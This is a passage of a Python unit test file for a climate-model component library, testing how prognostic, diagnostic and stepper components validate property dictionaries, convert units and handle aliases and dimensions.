    to let tests exercise components that skip base-class initialisation.
    """

    input_properties = {}
    tendency_properties = {}
    diagnostic_properties = {}

    def __init__(self):
        pass  # base-class initialiser deliberately not invoked

    def array_call(self, state):
        """Return empty tendency and diagnostic dicts."""
        return {}, {}
class BadMockImplicitTendencyComponent(ImplicitTendencyComponent):
    """Improperly constructed ImplicitTendencyComponent double.

    NOTE: ``__init__`` does not call ``super().__init__()`` — presumably
    to let tests exercise components that skip base-class initialisation.
    """

    input_properties = {}
    tendency_properties = {}
    diagnostic_properties = {}

    def __init__(self):
        pass  # base-class initialiser deliberately not invoked

    def array_call(self, state, timestep):
        """Return empty tendency and diagnostic dicts."""
        return {}, {}
class BadMockDiagnosticComponent(DiagnosticComponent):
    """Improperly constructed DiagnosticComponent double.

    NOTE: ``__init__`` does not call ``super().__init__()`` — presumably
    to let tests exercise components that skip base-class initialisation.
    """

    input_properties = {}
    diagnostic_properties = {}

    def __init__(self):
        pass  # base-class initialiser deliberately not invoked

    def array_call(self, state):
        """Return an empty diagnostics dict."""
        return {}
class BadMockStepper(Stepper):
    """Improperly constructed Stepper double.

    NOTE: ``__init__`` does not call ``super().__init__()`` — presumably
    to let tests exercise components that skip base-class initialisation.
    """

    input_properties = {}
    diagnostic_properties = {}
    output_properties = {}

    def __init__(self):
        pass  # base-class initialiser deliberately not invoked

    def array_call(self, state, timestep):
        """Return empty diagnostics and output-state dicts."""
        return {}, {}
class InputTestBase():
def test_raises_on_input_properties_of_wrong_type(self):
with self.assertRaises(InvalidPropertyDictError):
self.get_component(input_properties=({},))
def test_cannot_overlap_input_aliases(self):
input_properties = {
'input1': {'dims': ['dim1'], 'units': 'm', 'alias': 'input'},
'input2': {'dims': ['dim1'], 'units': 'm', 'alias': 'input'}
}
with self.assertRaises(InvalidPropertyDictError):
self.get_component(input_properties=input_properties)
def test_raises_when_input_missing(self):
input_properties = {
'input1': {
'dims': ['dim1'],
'units': 'm',
}
}
component = self.get_component(input_properties=input_properties)
state = {'time': timedelta(0)}
with self.assertRaises(InvalidStateError):
self.call_component(component, state)
def test_raises_when_input_incorrect_units(self):
input_properties = {
'input1': {
'dims': ['dim1'],
'units': 'm',
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.zeros([10]),
dims=['dim1'],
attrs={'units': 's'},
),
}
with self.assertRaises(InvalidStateError):
self.call_component(component, state)
def test_raises_when_input_incorrect_dims(self):
input_properties = {
'input1': {
'dims': ['dim1'],
'units': 'm',
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.zeros([10]),
dims=['dim2'],
attrs={'units': 'm'},
),
}
with self.assertRaises(InvalidStateError):
self.call_component(component, state)
def test_raises_when_input_conflicting_dim_lengths(self):
input_properties = {
'input1': {
'dims': ['dim1'],
'units': 'm',
},
'input1': {
'dims': ['dim2'],
'units': 'm',
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.zeros([10]),
dims=['dim1'],
attrs={'units': 'm'},
),
'input2': DataArray(
np.zeros([7]),
dims=['dim1'],
attrs={'units': 'm'},
),
}
with self.assertRaises(InvalidStateError):
self.call_component(component, state)
def test_collects_independent_wildcard_dims(self):
input_properties = {
'input1': {
'dims': ['*'],
'units': 'm',
},
'input2': {
'dims': ['*'],
'units': 'm',
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.zeros([4]),
dims=['dim1'],
attrs={'units': 'm'},
),
'input2': DataArray(
np.zeros([3]),
dims=['dim2'],
attrs={'units': 'm'},
),
}
self.call_component(component, state)
given = component.state_given
assert len(given.keys()) == 3
assert 'time' in given.keys()
assert 'input1' in given.keys()
assert given['input1'].shape == (12,)
assert 'input2' in given.keys()
assert given['input2'].shape == (12,)
def test_accepts_when_input_swapped_dims(self):
input_properties = {
'input1': {
'dims': ['dim1', 'dim2'],
'units': 'm',
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.zeros([3, 4]),
dims=['dim2', 'dim1'],
attrs={'units': 'm'},
),
}
self.call_component(component, state)
assert component.state_given['input1'].shape == (4, 3)
def test_input_requires_dims(self):
input_properties = {'input1': {'units': 'm'}}
with self.assertRaises(InvalidPropertyDictError):
self.get_component(input_properties=input_properties)
def test_input_requires_units(self):
input_properties = {'input1': {'dims': ['dim1']}}
with self.assertRaises(InvalidPropertyDictError):
self.get_component(input_properties=input_properties)
def test_input_no_transformations(self):
input_properties = {
'input1': {
'dims': ['dim1'],
'units': 'm'
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'm'}
)
}
self.call_component(component, state)
assert len(component.state_given) == 2
assert 'time' in component.state_given.keys()
assert 'input1' in component.state_given.keys()
assert isinstance(component.state_given['input1'], np.ndarray)
assert np.all(component.state_given['input1'] == np.ones([10]))
def test_input_converts_units(self):
input_properties = {
'input1': {
'dims': ['dim1'],
'units': 'm'
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'km'}
)
}
self.call_component(component, state)
assert len(component.state_given) == 2
assert 'time' in component.state_given.keys()
assert 'input1' in component.state_given.keys()
assert isinstance(component.state_given['input1'], np.ndarray)
assert np.all(component.state_given['input1'] == np.ones([10])*1000.)
def test_input_converts_temperature_units(self):
input_properties = {
'input1': {
'dims': ['dim1'],
'units': 'degK'
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'degC'}
)
}
self.call_component(component, state)
assert len(component.state_given) == 2
assert 'time' in component.state_given.keys()
assert 'input1' in component.state_given.keys()
assert isinstance(component.state_given['input1'], np.ndarray)
assert np.all(component.state_given['input1'] == np.ones([10])*274.15)
def test_input_collects_one_dimension(self):
input_properties = {
'input1': {
'dims': ['*'],
'units': 'm'
}
}
component = self.get_component(input_properties=input_properties)
state = {
'time': timedelta(0),
'input1': DataArray(
np.ones([10]),
dims=['dim1'],
attrs={'units': 'm'}
)
}
self.call_component(component, state)
assert len(component.state_given) == 2
assert 'time' in component.state_given.keys()
assert 'input1' in component.state_given.keys()
assert isinstance(component.state_given['input1'], np.ndarray)
assert np.all(component.state_given['input1'] == np.ones([10]))
def test_input_is_aliased(self):
    """An input with an 'alias' appears under the alias in the raw state."""
    component = self.get_component(
        input_properties={
            'input1': {'dims': ['dim1'], 'units': 'm', 'alias': 'in1'},
        }
    )
    state = {
        'time': timedelta(0),
        'input1': DataArray(
            np.ones([10]), dims=['dim1'], attrs={'units': 'm'}),
    }
    self.call_component(component, state)
    given = component.state_given
    assert len(given) == 2
    assert 'time' in given.keys()
    # the array is keyed by the alias 'in1', not the state name 'input1'
    assert 'in1' in given.keys()
    assert isinstance(given['in1'], np.ndarray)
    assert np.all(given['in1'] == np.ones([10]))
class DiagnosticTestBase():
    """Mixin test suite for components that produce diagnostic outputs.

    Subclasses (actual TestCase classes) must supply:
      - get_component(...): build the mock component under test
      - call_component(component, state): invoke it
      - get_diagnostics(result): extract the diagnostics dict from the
        component's return value
    """

    def test_raises_on_diagnostic_properties_of_wrong_type(self):
        # diagnostic_properties must be a dict; a tuple of dicts is invalid
        with self.assertRaises(InvalidPropertyDictError):
            self.get_component(diagnostic_properties=({},))

    def test_diagnostic_requires_dims(self):
        # 'dims' is mandatory unless inherited from a matching input property
        diagnostic_properties = {'diag1': {'units': 'm'}}
        with self.assertRaises(InvalidPropertyDictError):
            self.get_component(diagnostic_properties=diagnostic_properties)

    def test_diagnostic_requires_units(self):
        # 'units' is always mandatory for diagnostic properties
        diagnostic_properties = {'diag1': {'dims': ['dim1']}}
        with self.assertRaises(InvalidPropertyDictError):
            self.get_component(diagnostic_properties=diagnostic_properties)

    def test_diagnostic_raises_when_units_incompatible_with_input(self):
        # 'km' (length) and 'seconds' (time) cannot describe the same quantity
        input_properties = {
            'diag1': {'units': 'km', 'dims': ['dim1', 'dim2']}
        }
        diagnostic_properties = {
            'diag1': {'units': 'seconds', 'dims': ['dim1', 'dim2']}
        }
        with self.assertRaises(InvalidPropertyDictError):
            self.get_component(
                input_properties=input_properties,
                diagnostic_properties=diagnostic_properties
            )

    def test_diagnostic_requires_correct_number_of_dims(self):
        # diag1 is declared 2-d but the raw output array is 1-d
        input_properties = {
            'input1': {'units': 'm', 'dims': ['dim1', 'dim2']}
        }
        diagnostic_properties = {
            'diag1': {'units': 'm', 'dims': ['dim1', 'dim2']}
        }
        diagnostic_output = {'diag1': np.zeros([10]),}
        state = {
            'time': timedelta(0),
            'input1': DataArray(
                np.ones([10, 2]),
                dims=['dim1', 'dim2'],
                attrs={'units': 'm'}
            )
        }
        component = self.get_component(
            input_properties = input_properties,
            diagnostic_properties=diagnostic_properties,
            diagnostic_output=diagnostic_output,
        )
        with self.assertRaises(InvalidPropertyDictError):
            _, _ = self.call_component(component, state)

    def test_diagnostic_requires_correct_dim_length(self):
        # dim1 has length 10 in the input but 5 in the raw diagnostic output
        input_properties = {
            'input1': {'units': 'm', 'dims': ['dim1', 'dim2']}
        }
        diagnostic_properties = {
            'diag1': {'units': 'm', 'dims': ['dim1', 'dim2']}
        }
        diagnostic_output = {'diag1': np.zeros([5, 2]),}
        state = {
            'time': timedelta(0),
            'input1': DataArray(
                np.ones([10, 2]),
                dims=['dim1', 'dim2'],
                attrs={'units': 'm'}
            )
        }
        component = self.get_component(
            input_properties=input_properties,
            diagnostic_properties=diagnostic_properties,
            diagnostic_output=diagnostic_output
        )
        with self.assertRaises(InvalidPropertyDictError):
            _, _ = self.call_component(component, state)

    def test_diagnostic_uses_input_dims(self):
        # missing 'dims' is filled in from the same-named input property
        input_properties = {'diag1': {'dims': ['dim1'], 'units': 'm'}}
        diagnostic_properties = {'diag1': {'units': 'm'}}
        self.get_component(
            input_properties=input_properties,
            diagnostic_properties=diagnostic_properties
        )

    def test_diagnostic_doesnt_use_input_units(self):
        # unlike dims, 'units' is never inherited from the input property
        input_properties = {'diag1': {'dims': ['dim1'], 'units': 'm'}}
        diagnostic_properties = {'diag1': {'dims': ['dim1']}}
        with self.assertRaises(InvalidPropertyDictError):
            self.get_component(
                input_properties=input_properties,
                diagnostic_properties=diagnostic_properties
            )

    def test_diagnostics_no_transformations(self):
        # raw output array is wrapped into a DataArray with declared
        # dims/units; no unit or dim transformation is needed
        diagnostic_properties = {
            'output1': {
                'dims': ['dim1'],
                'units': 'm'
            }
        }
        diagnostic_output = {
            'output1': np.ones([10]),
        }
        component = self.get_component(
            diagnostic_properties=diagnostic_properties,
            diagnostic_output=diagnostic_output,
        )
        state = {'time': timedelta(0)}
        diagnostics = self.get_diagnostics(self.call_component(component, state))
        assert len(diagnostics) == 1
        assert 'output1' in diagnostics.keys()
        assert isinstance(diagnostics['output1'], DataArray)
        assert len(diagnostics['output1'].dims) == 1
        assert 'dim1' in diagnostics['output1'].dims
        assert 'units' in diagnostics['output1'].attrs
        assert len(diagnostics['output1'].attrs) == 1
        assert diagnostics['output1'].attrs['units'] == 'm'
        assert np.all(diagnostics['output1'].values == np.ones([10]))

    def test_diagnostics_restoring_dims(self):
        # the wildcard '*' dimension (size 1 here) is removed when the
        # diagnostic is restored to the input's original dims
        input_properties = {
            'input1': {
                'dims': ['*', 'dim1'],
                'units': 'm',
            }
        }
        diagnostic_properties = {
            'output1': {
                'dims': ['*', 'dim1'],
                'units': 'm'
            }
        }
        diagnostic_output = {
            'output1': np.ones([1, 10]),
        }
        component = self.get_component(
            input_properties=input_properties,
            diagnostic_properties=diagnostic_properties,
            diagnostic_output=diagnostic_output,
        )
        state = {
            'input1': DataArray(
                np.ones([10]),
                dims=['dim1'],
                attrs={'units': 'm'}),
            'time': timedelta(0)}
        diagnostics = self.get_diagnostics(self.call_component(component, state))
        assert len(diagnostics) == 1
        assert 'output1' in diagnostics.keys()
        assert isinstance(diagnostics['output1'], DataArray)
        assert len(diagnostics['output1'].dims) == 1
        assert 'dim1' in diagnostics['output1'].dims
        assert 'units' in diagnostics['output1'].attrs
        assert diagnostics['output1'].attrs['units'] == 'm'
        assert np.all(diagnostics['output1'].values == np.ones([10]))

    def test_diagnostics_with_alias(self):
        # the component writes the raw output under the alias 'out1';
        # the returned diagnostics use the full name 'output1'
        diagnostic_properties = {
            'output1': {
                'dims': ['dim1'],
                'units': 'm',
                'alias': 'out1',
            }
        }
        diagnostic_output = {
            'out1': np.ones([10]),
        }
        component = self.get_component(
            diagnostic_properties=diagnostic_properties,
            diagnostic_output=diagnostic_output,
        )
        state = {'time': timedelta(0)}
        diagnostics = self.get_diagnostics(self.call_component(component, state))
        assert len(diagnostics) == 1
        assert 'output1' in diagnostics.keys()
        assert isinstance(diagnostics['output1'], DataArray)
        assert len(diagnostics['output1'].dims) == 1
        assert 'dim1' in diagnostics['output1'].dims
        assert 'units' in diagnostics['output1'].attrs
        assert diagnostics['output1'].attrs['units'] == 'm'
        assert np.all(diagnostics['output1'].values == np.ones([10]))

    def test_diagnostics_with_alias_from_input(self):
        # an alias declared on the input property also applies to the
        # same-named diagnostic output
        input_properties = {
            'output1': {
                'dims': ['dim1'],
                'units': 'm',
                'alias': 'out1',
            }
        }
        diagnostic_properties = {
            'output1': {
                'dims': ['dim1'],
                'units': 'm',
            }
        }
        diagnostic_output = {
            'out1': np.ones([10]),
        }
        component = self.get_component(
            input_properties=input_properties,
            diagnostic_properties=diagnostic_properties,
            diagnostic_output=diagnostic_output,
        )
        state = {
            'time': timedelta(0),
            'output1': DataArray(
                np.ones([10]),
                dims=['dim1'],
                attrs={'units': 'm'}
            )
        }
        diagnostics = self.get_diagnostics(self.call_component(component, state))
        assert len(diagnostics) == 1
        assert 'output1' in diagnostics.keys()
        assert isinstance(diagnostics['output1'], DataArray)
        assert len(diagnostics['output1'].dims) == 1
        assert 'dim1' in diagnostics['output1'].dims
        assert 'units' in diagnostics['output1'].attrs
        assert diagnostics['output1'].attrs['units'] == 'm'
        assert np.all(diagnostics['output1'].values == np.ones([10]))

    def test_diagnostics_with_dims_from_input(self):
        # diagnostic 'dims' omitted here; inherited from the input property
        input_properties = {
            'output1': {
                'dims': ['dim1'],
                'units': 'm',
            }
        }
        diagnostic_properties = {
            'output1': {
                'units': 'm',
            }
        }
        diagnostic_output = {
            'output1': np.ones([10]),
        }
        component = self.get_component(
            input_properties=input_properties,
            diagnostic_properties=diagnostic_properties,
            diagnostic_output=diagnostic_output,
        )
        state = {
            'time': timedelta(0),
            'output1': DataArray(
                np.ones([10]),
                dims=['dim1'],
                attrs={'units': 'm'}
            )
        }
        diagnostics = self.get_diagnostics(self.call_component(component, state))
        assert len(diagnostics) == 1
        assert 'output1' in diagnostics.keys()
        assert isinstance(diagnostics['output1'], DataArray)
        assert len(diagnostics['output1'].dims) == 1
        assert 'dim1' in diagnostics['output1'].dims
        assert 'units' in diagnostics['output1'].attrs
        assert diagnostics['output1'].attrs['units'] == 'm'
        assert np.all(diagnostics['output1'].values == np.ones([10]))

    def test_raises_when_diagnostic_not_given(self):
        # declaring diag1 but not producing it must fail at call time
        diagnostic_properties = {
            'diag1': {
                'dims': ['dims1'],
                'units': 'm',
            }
        }
        diagnostic_output = {}
        diagnostic = self.get_component(
            diagnostic_properties=diagnostic_properties,
            diagnostic_output=diagnostic_output
        )
        state = {'time': timedelta(0)}
        with self.assertRaises(ComponentMissingOutputError):
            self.call_component(diagnostic, state)

    def test_raises_when_extraneous_diagnostic_given(self):
        # producing diag1 without declaring it must fail at call time
        diagnostic_properties = {}
        diagnostic_output = {
            'diag1': np.zeros([10])
        }
        diagnostic = self.get_component(
            diagnostic_properties=diagnostic_properties,
            diagnostic_output=diagnostic_output
        )
        state = {'time': timedelta(0)}
        with self.assertRaises(ComponentExtraOutputError):
            self.call_component(diagnostic, state)
class PrognosticTests(unittest.TestCase, InputTestBase):
    """Tests for TendencyComponent behavior, run against MockTendencyComponent.

    Also serves as the base suite for ImplicitTendencyComponent tests,
    which override component_class and the helper methods below.

    Fix: removed a leftover debug print() in
    test_tendencies_in_diagnostics_one_tendency_with_component_name.
    """

    component_class = MockTendencyComponent

    def call_component(self, component, state):
        """Invoke the component; returns (tendencies, diagnostics)."""
        return component(state)

    def get_component(
            self, input_properties=None, tendency_properties=None,
            diagnostic_properties=None, tendency_output=None,
            diagnostic_output=None):
        """Construct a MockTendencyComponent, defaulting each dict to empty."""
        return MockTendencyComponent(
            input_properties=input_properties or {},
            tendency_properties=tendency_properties or {},
            diagnostic_properties=diagnostic_properties or {},
            tendency_output=tendency_output or {},
            diagnostic_output=diagnostic_output or {},
        )

    def get_diagnostics(self, result):
        """Diagnostics are the second element of the component's return."""
        return result[1]

    def test_raises_on_tendency_properties_of_wrong_type(self):
        # tendency_properties must be a dict, not a tuple of dicts
        with self.assertRaises(InvalidPropertyDictError):
            self.get_component(tendency_properties=({},))

    def test_cannot_use_bad_component(self):
        component = BadMockTendencyComponent()
        with self.assertRaises(RuntimeError):
            self.call_component(component, {'time': timedelta(0)})

    def test_subclass_check(self):
        # a duck-typed class with the right attributes and methods counts
        # as a TendencyComponent instance without inheriting from it
        class MyPrognostic(object):
            input_properties = {}
            diagnostic_properties = {}
            tendency_properties = {}
            tendencies_in_diagnostics = False
            name = ''

            def __call__(self):
                pass

            def array_call(self):
                pass

        instance = MyPrognostic()
        assert isinstance(instance, TendencyComponent)

    def test_tendency_raises_when_units_incompatible_with_input(self):
        # km (length) and degK/s (temperature tendency) are incompatible
        input_properties = {
            'input1': {'units': 'km', 'dims': ['dim1', 'dim2']}
        }
        tendency_properties = {
            'input1': {'units': 'degK/s', 'dims': ['dim1', 'dim2']}
        }
        with self.assertRaises(InvalidPropertyDictError):
            self.get_component(
                input_properties=input_properties,
                tendency_properties=tendency_properties
            )

    def test_two_components_are_not_instances_of_each_other(self):
        class MyTendencyComponent1(TendencyComponent):
            input_properties = {}
            diagnostic_properties = {}
            tendency_properties = {}
            tendencies_in_diagnostics = False
            name = ''

            def array_call(self, state):
                pass

        class MyTendencyComponent2(TendencyComponent):
            input_properties = {}
            diagnostic_properties = {}
            tendency_properties = {}
            tendencies_in_diagnostics = False
            name = ''

            def array_call(self, state):
                pass

        prog1 = MyTendencyComponent1()
        prog2 = MyTendencyComponent2()
        assert not isinstance(prog1, MyTendencyComponent2)
        assert not isinstance(prog2, MyTendencyComponent1)

    def test_ducktype_not_instance_of_subclass(self):
        # duck typing makes an object a TendencyComponent, but never an
        # instance of a concrete user-defined subclass
        class MyPrognostic1(object):
            input_properties = {}
            diagnostic_properties = {}
            tendency_properties = {}
            tendencies_in_diagnostics = False
            name = ''

            def __init__(self):
                pass

            def array_call(self, state):
                pass

        class MyTendencyComponent2(TendencyComponent):
            input_properties = {}
            diagnostic_properties = {}
            tendency_properties = {}
            tendencies_in_diagnostics = False
            name = ''

            def array_call(self, state):
                pass

        prog1 = MyPrognostic1()
        assert not isinstance(prog1, MyTendencyComponent2)

    def test_empty_prognostic(self):
        prognostic = self.component_class({}, {}, {}, {}, {})
        tendencies, diagnostics = self.call_component(
            prognostic, {'time': timedelta(seconds=0)})
        assert tendencies == {}
        assert diagnostics == {}
        assert len(prognostic.state_given) == 1
        assert 'time' in prognostic.state_given.keys()
        assert prognostic.state_given['time'] == timedelta(seconds=0)
        assert prognostic.times_called == 1

    def test_tendency_requires_dims(self):
        input_properties = {}
        diagnostic_properties = {}
        tendency_properties = {'tend1': {'units': 'm'}}
        diagnostic_output = {}
        tendency_output = {}
        with self.assertRaises(InvalidPropertyDictError):
            self.component_class(
                input_properties, diagnostic_properties,
                tendency_properties,
                diagnostic_output, tendency_output
            )

    def test_tendency_uses_base_dims(self):
        # missing tendency 'dims' is filled in from the input property
        input_properties = {'diag1': {'dims': ['dim1'], 'units': 'm'}}
        diagnostic_properties = {}
        tendency_properties = {'diag1': {'units': 'm/s'}}
        diagnostic_output = {}
        tendency_output = {}
        self.component_class(
            input_properties, diagnostic_properties,
            tendency_properties,
            diagnostic_output, tendency_output
        )

    def test_tendency_doesnt_use_base_units(self):
        # unlike dims, 'units' is never inherited from the input property
        input_properties = {'diag1': {'dims': ['dim1'], 'units': 'm'}}
        diagnostic_properties = {}
        tendency_properties = {'diag1': {'dims': ['dim1']}}
        diagnostic_output = {}
        tendency_output = {}
        with self.assertRaises(InvalidPropertyDictError):
            self.component_class(
                input_properties, diagnostic_properties,
                tendency_properties,
                diagnostic_output, tendency_output
            )

    def test_tendency_requires_units(self):
        input_properties = {}
        diagnostic_properties = {}
        tendency_properties = {'tend1': {'dims': ['dim1']}}
        diagnostic_output = {}
        tendency_output = {}
        with self.assertRaises(InvalidPropertyDictError):
            self.component_class(
                input_properties, diagnostic_properties,
                tendency_properties,
                diagnostic_output, tendency_output
            )

    def test_raises_when_tendency_not_given(self):
        # declared tendency not produced by array_call -> error at call time
        input_properties = {}
        diagnostic_properties = {}
        tendency_properties = {
            'tend1': {
                'dims': ['dims1'],
                'units': 'm',
            }
        }
        diagnostic_output = {}
        tendency_output = {}
        prognostic = self.component_class(
            input_properties, diagnostic_properties, tendency_properties,
            diagnostic_output, tendency_output
        )
        state = {'time': timedelta(0)}
        with self.assertRaises(ComponentMissingOutputError):
            _, _ = self.call_component(prognostic, state)

    def test_cannot_overlap_input_aliases(self):
        # two inputs may not share the same alias
        input_properties = {
            'input1': {'dims': ['dim1'], 'units': 'm', 'alias': 'input'},
            'input2': {'dims': ['dim1'], 'units': 'm', 'alias': 'input'}
        }
        diagnostic_properties = {}
        tendency_properties = {}
        diagnostic_output = {}
        tendency_output = {}
        with self.assertRaises(InvalidPropertyDictError):
            self.component_class(
                input_properties, diagnostic_properties,
                tendency_properties,
                diagnostic_output, tendency_output
            )

    def test_cannot_overlap_diagnostic_aliases(self):
        input_properties = {
        }
        diagnostic_properties = {
            'diag1': {'dims': ['dim1'], 'units': 'm', 'alias': 'diag'},
            'diag2': {'dims': ['dim1'], 'units': 'm', 'alias': 'diag'}
        }
        tendency_properties = {}
        diagnostic_output = {}
        tendency_output = {}
        with self.assertRaises(InvalidPropertyDictError):
            self.component_class(
                input_properties, diagnostic_properties,
                tendency_properties,
                diagnostic_output, tendency_output
            )

    def test_cannot_overlap_tendency_aliases(self):
        input_properties = {
        }
        diagnostic_properties = {
        }
        tendency_properties = {
            'tend1': {'dims': ['dim1'], 'units': 'm', 'alias': 'tend'},
            'tend2': {'dims': ['dim1'], 'units': 'm', 'alias': 'tend'}
        }
        diagnostic_output = {}
        tendency_output = {}
        with self.assertRaises(InvalidPropertyDictError):
            self.component_class(
                input_properties, diagnostic_properties,
                tendency_properties,
                diagnostic_output, tendency_output
            )

    def test_raises_when_extraneous_tendency_given(self):
        # produced tendency that was never declared -> error at call time
        input_properties = {}
        diagnostic_properties = {}
        tendency_properties = {}
        diagnostic_output = {}
        tendency_output = {
            'tend1': np.zeros([10]),
        }
        prognostic = self.component_class(
            input_properties, diagnostic_properties, tendency_properties,
            diagnostic_output, tendency_output
        )
        state = {'time': timedelta(0)}
        with self.assertRaises(ComponentExtraOutputError):
            _, _ = self.call_component(prognostic, state)

    def test_raises_when_diagnostic_not_given(self):
        input_properties = {}
        diagnostic_properties = {
            'diag1': {
                'dims': ['dims1'],
                'units': 'm',
            }
        }
        tendency_properties = {}
        diagnostic_output = {}
        tendency_output = {}
        prognostic = self.component_class(
            input_properties, diagnostic_properties, tendency_properties,
            diagnostic_output, tendency_output
        )
        state = {'time': timedelta(0)}
        with self.assertRaises(ComponentMissingOutputError):
            _, _ = self.call_component(prognostic, state)

    def test_raises_when_extraneous_diagnostic_given(self):
        input_properties = {}
        diagnostic_properties = {}
        tendency_properties = {}
        diagnostic_output = {
            'diag1': np.zeros([10])
        }
        tendency_output = {}
        prognostic = self.component_class(
            input_properties, diagnostic_properties, tendency_properties,
            diagnostic_output, tendency_output
        )
        state = {'time': timedelta(0)}
        with self.assertRaises(ComponentExtraOutputError):
            _, _ = self.call_component(prognostic, state)

    def test_tendencies_no_transformations(self):
        # raw tendency array comes back wrapped with the declared dims/units
        input_properties = {}
        diagnostic_properties = {}
        tendency_properties = {
            'output1': {
                'dims': ['dim1'],
                'units': 'm/s'
            }
        }
        diagnostic_output = {}
        tendency_output = {
            'output1': np.ones([10]),
        }
        prognostic = self.component_class(
            input_properties, diagnostic_properties, tendency_properties,
            diagnostic_output, tendency_output
        )
        state = {'time': timedelta(0)}
        tendencies, _ = self.call_component(prognostic, state)
        assert len(tendencies) == 1
        assert 'output1' in tendencies.keys()
        assert isinstance(tendencies['output1'], DataArray)
        assert len(tendencies['output1'].dims) == 1
        assert 'dim1' in tendencies['output1'].dims
        assert 'units' in tendencies['output1'].attrs
        assert len(tendencies['output1'].attrs) == 1
        assert tendencies['output1'].attrs['units'] == 'm/s'
        assert np.all(tendencies['output1'].values == np.ones([10]))

    def test_tendencies_with_alias(self):
        # raw output is keyed by the alias; returned tendency by full name
        input_properties = {}
        diagnostic_properties = {}
        tendency_properties = {
            'output1': {
                'dims': ['dim1'],
                'units': 'm/s',
                'alias': 'out1',
            }
        }
        diagnostic_output = {}
        tendency_output = {
            'out1': np.ones([10]),
        }
        prognostic = self.component_class(
            input_properties, diagnostic_properties, tendency_properties,
            diagnostic_output, tendency_output
        )
        state = {'time': timedelta(0)}
        tendencies, _ = self.call_component(prognostic, state)
        assert len(tendencies) == 1
        assert 'output1' in tendencies.keys()
        assert isinstance(tendencies['output1'], DataArray)
        assert len(tendencies['output1'].dims) == 1
        assert 'dim1' in tendencies['output1'].dims
        assert 'units' in tendencies['output1'].attrs
        assert tendencies['output1'].attrs['units'] == 'm/s'
        assert np.all(tendencies['output1'].values == np.ones([10]))

    def test_tendencies_with_alias_from_input(self):
        # alias declared on the input property applies to the tendency too
        input_properties = {
            'output1': {
                'dims': ['dim1'],
                'units': 'm',
                'alias': 'out1',
            }
        }
        diagnostic_properties = {}
        tendency_properties = {
            'output1': {
                'dims': ['dim1'],
                'units': 'm/s',
            }
        }
        diagnostic_output = {}
        tendency_output = {
            'out1': np.ones([10]),
        }
        prognostic = self.component_class(
            input_properties, diagnostic_properties, tendency_properties,
            diagnostic_output, tendency_output
        )
        state = {
            'time': timedelta(0),
            'output1': DataArray(
                np.ones([10]),
                dims=['dim1'],
                attrs={'units': 'm'}
            )
        }
        tendencies, _ = self.call_component(prognostic, state)
        assert len(tendencies) == 1
        assert 'output1' in tendencies.keys()
        assert isinstance(tendencies['output1'], DataArray)
        assert len(tendencies['output1'].dims) == 1
        assert 'dim1' in tendencies['output1'].dims
        assert 'units' in tendencies['output1'].attrs
        assert tendencies['output1'].attrs['units'] == 'm/s'
        assert np.all(tendencies['output1'].values == np.ones([10]))

    def test_tendencies_with_dims_from_input(self):
        # tendency 'dims' omitted; inherited from the input property
        input_properties = {
            'output1': {
                'dims': ['dim1'],
                'units': 'm',
            }
        }
        diagnostic_properties = {}
        tendency_properties = {
            'output1': {
                'units': 'm/s',
            }
        }
        diagnostic_output = {}
        tendency_output = {
            'output1': np.ones([10]),
        }
        prognostic = self.component_class(
            input_properties, diagnostic_properties, tendency_properties,
            diagnostic_output, tendency_output
        )
        state = {
            'time': timedelta(0),
            'output1': DataArray(
                np.ones([10]),
                dims=['dim1'],
                attrs={'units': 'm'}
            )
        }
        tendencies, _ = self.call_component(prognostic, state)
        assert len(tendencies) == 1
        assert 'output1' in tendencies.keys()
        assert isinstance(tendencies['output1'], DataArray)
        assert len(tendencies['output1'].dims) == 1
        assert 'dim1' in tendencies['output1'].dims
        assert 'units' in tendencies['output1'].attrs
        assert tendencies['output1'].attrs['units'] == 'm/s'
        assert np.all(tendencies['output1'].values == np.ones([10]))

    def test_tendencies_in_diagnostics_no_tendency(self):
        # tendencies_in_diagnostics with no tendencies adds no diagnostics
        input_properties = {}
        diagnostic_properties = {}
        tendency_properties = {}
        diagnostic_output = {}
        tendency_output = {}
        prognostic = self.component_class(
            input_properties, diagnostic_properties, tendency_properties,
            diagnostic_output, tendency_output, tendencies_in_diagnostics=True
        )
        assert prognostic.input_properties == {}
        assert prognostic.diagnostic_properties == {}
        assert prognostic.tendency_properties == {}
        state = {'time': timedelta(0)}
        _, diagnostics = self.call_component(prognostic, state)
        assert diagnostics == {}

    def test_tendencies_in_diagnostics_one_tendency(self):
        input_properties = {}
        diagnostic_properties = {}
        tendency_properties = {
            'output1': {
                'dims': ['dim1'],
                'units': 'm/s'
            }
        }
        diagnostic_output = {}
        tendency_output = {
            'output1': np.ones([10]) * 20.,
        }
        prognostic = self.component_class(
            input_properties, diagnostic_properties, tendency_properties,
            diagnostic_output, tendency_output, tendencies_in_diagnostics=True,
        )
        # default diagnostic name embeds the component's class name
        tendency_name = 'output1_tendency_from_{}'.format(prognostic.__class__.__name__)
        assert len(prognostic.diagnostic_properties) == 1
        assert tendency_name in prognostic.diagnostic_properties.keys()
        properties = prognostic.diagnostic_properties[tendency_name]
        assert properties['dims'] == ['dim1']
        assert properties['units'] == 'm/s'
        state = {
            'time': timedelta(0),
        }
        _, diagnostics = self.call_component(prognostic, state)
        assert tendency_name in diagnostics.keys()
        assert len(
            diagnostics[tendency_name].dims) == 1
        assert 'dim1' in diagnostics[tendency_name].dims
        assert diagnostics[tendency_name].attrs['units'] == 'm/s'
        assert np.all(diagnostics[tendency_name].values == 20.)

    def test_tendencies_in_diagnostics_one_tendency_dims_from_input(self):
        input_properties = {
            'output1': {
                'dims': ['dim1'],
                'units': 'm',
            }
        }
        diagnostic_properties = {}
        tendency_properties = {
            'output1': {
                'units': 'm/s'
            }
        }
        diagnostic_output = {}
        tendency_output = {
